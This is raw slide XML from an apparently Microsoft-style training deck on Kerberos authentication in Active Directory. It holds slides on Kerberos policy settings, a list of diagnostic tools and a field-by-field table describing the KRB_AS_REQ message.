              </a:rPr>
              <a:t>attribute)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DES encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pre-authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Local Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encryption types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Account Policies – Kerberos Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maximum tolerance: 5 min.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maximum lifetime for tickets: 10 hours</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37686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UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Useful tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="2400657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>klist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>setspn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>psexec (SysInternals)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>logonsessions (SysInternals)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64815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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403727" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_AS_REQ message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="コンテンツ プレースホルダー 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8393374" cy="4285593"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1773600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6619774">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1"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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0"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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_AS_REQ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="230551">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PAData Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PA-AS-REQ or PA-PK-AS-REQ.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="699463">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PAData Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The AS_REQ includes a client timestamp encrypted with the user key. In this case, the data type will be PA-AS-REQ.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>If a Smart Card is used, the user's public certificate signed with the user's private key will be placed in this field. The data type will be PA-PK-AS-REQ in this case.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KDC Options</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The client can request that the TGT have certain optional features. The KDC options are detailed in the table below.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm (Active Directory domain) of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In the KRB_AS_REQ, this will be the KDC name. The client is specifically requesting a ticket for the TGS.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>From</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) If the ticket were postdated (not supported by Windows 2000, but is supported in Windows Server 2003), this field would specify the time from which the ticket would be valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Till</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the requested expiration time. The KDC does not have to honor this request if the requested expiration time violates the domain's Kerberos policy.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) The requested renewal time.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="493432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nonce</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A random number generated by the client. The nonce can be used as the basis for sequence numbering or as an additional authenticator. The nonce supplied here will be returned in the encrypted portion of the KRB_AS_REP message. The client will compare the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nonces</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> to make sure they match.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encryption Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The desired encryption algorithm to be used.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Addresses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
